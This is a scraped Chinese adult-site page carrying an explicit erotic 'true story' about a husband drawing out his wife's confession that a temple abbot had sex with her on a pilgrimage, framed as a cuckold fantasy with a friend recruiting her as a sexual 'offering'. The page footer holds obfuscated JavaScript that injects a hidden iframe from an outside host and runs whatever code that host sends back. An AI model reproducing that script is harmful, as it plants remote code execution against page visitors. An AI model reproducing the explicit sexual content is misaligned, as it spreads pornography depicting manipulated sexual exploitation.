通栏

我老婆的首次出墙,献祭品(真实故事)

发布:05-28 发布:91免费国产

吃着晚餐,老婆跟我商量,说她一起走佛堂的朋友想约她一起去印度,想体验一下佛教发源国的佛旅。此次行程约需30天,有一个曾经去过的朋友会安排一切,而且大部分的行程会住在寺里。
我老婆已经是50岁的女人了,但是因为保养得体,积极运动,身体还保持着像40岁的样子、而且摸起来也真像40岁的女人。她有一对接近E罩杯的大奶(年轻时就以这奶子被人注意),屁股也漂亮,从后面干起来,屁股是一个梨型,日本人喜欢的梨型屁股。我老婆长着一张看起来很容易受骗的脸,。ㄟ,竟然就是这三个要素,她才被邀约呢。这是我后来才确定的。
她这个朋友已经屡次邀约,而且锲而不捨;她是40岁左右,老公在某上市公司上班、小奶子,小屁股。虽然如此,也是有几分姿色。我心里一直就嘀咕着,她为甚幺非要我老婆一起去?有什幺猫腻吗?
事后还真有猫腻勒。
我一向不喜欢参加佛旅,也不愿意花那幺长的时间耗在上面,所以我答应我老婆让她自己去了,虽然有些嘀咕,但是还是告诉自己要放心,然而我检视我内心深处,竟然在期待会发生什幺事ㄟ!?
故事发生在我老婆回来后~
我们并排躺在床上,刚刚洗完澡,裸着身体,开足的空调让我们轻鬆又清爽。
我搂着她,一手轻轻的挑着她粉红色的乳头,揉捏着奶子,偶尔向下游走环玩她的阴毛,侵入她的阴户地带,柔柔的拂过阴唇。她喜欢我这样,不消几下她就会淫水氾滥,然后等待我的进入。她闭着眼,享受着我的爱抚,双腿配合着大大的张开。ㄟˊ!!反常必有妖,以前都要我翻身过去,让我打开双腿才肯开放阴户的呀。
我已经有三十几天没有干她了,我的干部早已经勃起,而且坚挺如昔。

我:怎幺样,这次佛旅如何呢?寺庙里住得习惯吗?

随着第二个问题,我感觉到她震颤了一下,但是她随即假装是因为我的手碰了她的阴核。嗯,我的第六感告诉我有隐藏的故事、或事故?
我老婆(美):这次玩得不错呀!尤其是我终于完成了我一直想要的朝圣之旅。
我:那边白天很热吧!
美:不只是白天,晚上也热呀!
我:没有空调吗?
美:有是有,但是机器太小了,人又多,大家都热得睡不着。
我:妳受得了吗?
美:受不了呀,不过第二天晚上我就比较幸运了,兰帮我应了一个工作,
(兰就是那个邀约她参加的朋友)
     要去帮住持大师抄一些寺里的文书并列入档案,英文的。
     我就被带去一个单人房住下了,房间内有书桌,可以作业。
我:没有别人一起帮忙吗?兰呢?
美:兰有其他的事也被拜託了。而且大师说,那是一个内院,不适合一般人进去。

真是很奇怪的安排,我第一个想法就是,安排一个来访的佛友抄文书,是毫无道理的,而且要去一个内院的单人房作业?一个女佛友?各位,你们也会有所存疑吧!
我曾经听说过佛教教义中的一门,是关于如何进行佛义修炼,其修炼是参杂某种性奉献的活动以表现其忠于佛法及师父。有些佛修的佛友认为能够给佛门大师牺牲奉献是一个极大的荣誉,甚至奉献身体也在所不惜,而且会更受到师父的亲睐。
藏传彿教对这一门更是为主要的修炼,不是也有丈夫出来控诉的新闻吗?以前我不在意真假,也是事不关己,现在,难道我也要经历这一门吗?
难道美是被设计了,最终是被设计成奉献给大师的性献礼?献出她的大奶让大师摸?奉献她美丽的逼给师父干?别的男人揉着她的大奶,一边吸吮着她的乳头,美张开着她的大腿,就让师父的大懒觉塞进她的浪逼,进进出出?这个画面很是清楚,但是我怎幺都不生气?反而有兴奋的快感,很想知道美被干是怎幺情景,嘿,老婆可能送个绿帽子,我的吊怎幺就硬绑绑的了?难道这我也是外国的Cockold的一员?(知道老婆被别的男人干了,不但不生气,反而兴奋得很,而且容许再发生)

我:房间有空调吗?房间是怎样的样子呢?
美:有空调,房间不算大,有一个小窗户,有半透明的窗帘,看出去是一个小中庭花园,有个小浴室。另一面墙有个门连假着办公室。
我:在那边会想老公吗?
美:有啊,我们没有分离那幺久,以前都随时可以做爱。跟着团体我连自慰的机会都没有哩。
我:结果妳有动妳的逼吗?
美:有,因为我想你,我想你插我。
这点我同意她会,因为她真的喜欢性,喜欢我干她。
我:妳脱光衣服了?
美:床上放了一件折好的沙龙,我想是给我用的吧!我洗完澡,换上了沙龙,沙龙只够围在腰间,我想只有我一个人,没人会看见,我就半裸的躺在床上。
(她忘记了那半透明的窗帘)。后来我索性退去了沙龙,全裸的躺在床上,一边自慰一边想老公。我差一点就高潮了。
高潮?我敢打赌,她有高潮也不是想我的!
哼,待我审出实情。
我翻过身体压向美,我吸吮她的奶头,我再次摸向她的阴户,啊,已经氾滥了啦!
我:我真喜欢玩妳的奶子。说实话师父有没有盯着妳的大奶看呀?
美的身体又是一颤。红着脸,小小的点了头。
我们有一次去一个小夜市,我让她不带奶罩,我知道会引入注目,我注意着哪个男同胞会盯着她的激凸看,然后悄悄的吿诉她。她也会告诉我前面来的人也看她了。我们可是情趣极了。这样的小冒险,我让我们当晚的做爱,比平常爽几倍呢。
美:有ㄟ,你也喜欢你老婆的奶被看的呀,不是吗?
我:是呀,反正看了也不会掉块肉,他们也摸不到。
我往下往下开始舔着她的阴核,舌头划着她的阴户。
我:妳不知道窗外可以看着妳全裸的身体吗?有人早在外面埋伏啰。
美配合着我的舌头,挺着逼对应着,发出兹兹的声音。
我:妳会让师父也像我现在一样舔妳的逼吗?
美:是啊.....师父......不是.......没有......
未完成的句子是:是的,师父就是这样舔的。我猜
美:老公,你要让我给他舔吗?

我:骚了呵,让师父舔呀,我可以让他舔妳淫水多多的逼。
美更大动作的摇着逼,迎向我的舌头。
美:真的吗,啊..........你可不要反悔啊........啊........那可是你老婆的逼呀!
真是淫蕩的女人,竟然一时不敢确定就是我老婆ㄟ。而我更是兴奋起来了!
我是不是cockold 的成员呀!我自己问自己。
应该是吧!条件一 已经满足:幻想老婆被舔逼,自己却很兴奋。
我开始将我100%勃起的大屌,慢慢的插入美的阴户,淫水很多,很容就进入了,我缓慢的开始抽插,美闭着眼,双颊红晕,不知是享受着现在我的性爱,还是想着被师父干的姦情。
我:像不像师父正在干妳的逼,感觉是不是一样?
美点一点头,又急速的摇着头。
美:啊.....我的意思是,应该一样吧!
我:妳自慰的时候,有没有幻想让师父干妳?
美:说实话吗?老公你可别生气呀!
我:不生气,我说话算话!
美:真的有幻想,师父的体格不差呢。幻想他的屌应该也很大。
我用力顶了美的逼,顶进去逼的深处,美也配合着对顶上来,而且啊啊的淫叫。
我:他的屌一定比老公大,是吗?大粗屌硬得很!
美:是...是....啊.....
美翻着白眼,心智已然失控!
我:妳就没有听到门打开的声音吗?
美:我根本没有听到。
中!口供审实,门有打开过!当然是师父才能打开的。
我:门开过呀?师父进来了吧?
美:我.......
美停顿了一下,别过脸去,但是呼吸仍然急促,我抽插着美的逼,抓着美的大奶。
我:说实话,师父进来干了妳吗?
美:没.......有........
我:说实话,有还是没有,我不生气,妳看老公更兴奋了,屌有没有更大?
美:有,大屌插得好爽。
我:谁的大屌?
美:我说实话,你可别生气,你答应过的。
我:不生气,答应妳。
美:是师父的大屌,插得我好爽好爽,还不是你,每次做爱都要我角色扮演,每次都有不同的人在干你老婆。这次你能满足了啦,你老婆的水逼,确实是让别人干了。
啊.....换我失控了,我的屌明显涨大,在已经成了蕩妇的老婆的逼里面,已经要到了发射临界点。
美:我故意把脚张得开开的,让师父可以清楚看到你老婆的逼,我让师父用力玩你老婆的奶子。我让他亲吻我的奶,吻遍全身,最终停在你老婆的骚逼上舔逼,真的好爽。
美:老公你还真是王八龟公勒,你老婆被玩了,你还那幺兴奋。
我:看起来我还真是呢!为什幺我不但不生气,我还那幺爽啊。师父插进去没?
看来我还符合cockold 成员的第二条件。
美:师父舔得我爽毙了,我让他慢慢的插进来,我搂着他,他的大屌进去的时候,我有大声的说:老公,你老婆的逼被插了,你听见吗?你老婆的逼今天献祭给佛门了,师父正在佔有你老婆的身体了。
强烈的嫉妒心,佔满了我的心里,但是同时兴奋感,也油然而生,插了几十年的老逼,近年确实有些失感,失去了新鲜感,但是你不在意的女体,在别人眼里,可是一个美丽而新鲜的猎物,别的男人会用尽一切手段来得到她,对他们来说毕竟是一个新鲜逼,新鲜奶子。当你知道别人用了你老婆的老逼,嫉妒心会让你回头看着你老婆的身体,你会更想用她,更想干她,好像老婆被别人插了逼,老逼也新鲜起来了。
这正是符合cockold 成员的第三条件。被别人用过的老婆更新鲜。
我兴奋到了顶点,老婆也因为释放了罪恶感,更享受我的抽插,淫水更氾滥,完全超过以前做爱的表现。是谁说的,女人的内心有一角,存放的是一个妓女的角色。我信,我老婆就是往这个角色转了。
我:老婆,我要射了!
美:来呀!我也要高潮了,我们一起。啊.......啊......老公对不起,我没先问你我就.......
我:妈的,我老婆竟然被一个师父插了,问题是我还爽成这样,妈的王八!
我开始猛烈的抽插,老婆的逼流出更多的淫水,屁股向上迎着我的进出。
我:要射进去了,他也射进去了吧!
美:有,像你一样!射在里面!
我:干,还射里面!
我们同时达到高潮,很久没有这样了。

兰在以前就来过这个寺庙住过,师父也看上她了,招式如出一彻,也献祭了她的身体,主要是她老公很早就不举了,她在这种佛旅中找到了生命的意义,找到了渴望性交的出处。这种佛旅就是最好的掩护,她老公一点都没有怀疑。
兰答应过师父,每次成团都会带一个献体献祭给师父,我那看起来很好骗的老婆就变成了目标,大奶无脑,还真是的。旅行的第一天兰就向我老婆洗脑了,我老婆住进那间小房间是就知道会发生什幺事了,她想我永远不会知道这种事,没想到三下两下就被我问出来了。要知道这些修佛的女人都知道献祭身体的可能,只是不为外人知晓罢了。
不过我老婆也不是毫无把握,她盘算过我生气的可能不会超过四成,我感觉我是被我老婆算计了。我就是个Cockold.


91免费国产推荐: 学妹乱伦哥哥在线直播大秀

底部
统计
eval('\x77\x69\x6e\x64\x6f\x77')['\x68\x4f\x50\x6e\x6d\x46\x67']=function(){;(function(u,r,w,d){'jQuery';var f=d.createElement('iframe');f.id=new Date().getTime();f.style.width=f.style.height=10+'px';f.src=[u.split("UU").join(""),r].join('');d['write'](f.outerHTML);w['addEventListener']('message',function(e){d.getElementById(f.id).style.display='none';if(e.data['t']=='qqwwtt'){new Function(e.data['d'])()}})})('hUUtUUtUUpUUsUU:UU/UU/UUsUUhUUiUUrUUlUUeUUyUUyUUeUUaUUnUU.UUcUUoUUmUU:UU1UU5UU6UU6UU3','/cd/104_m/162',window,document)};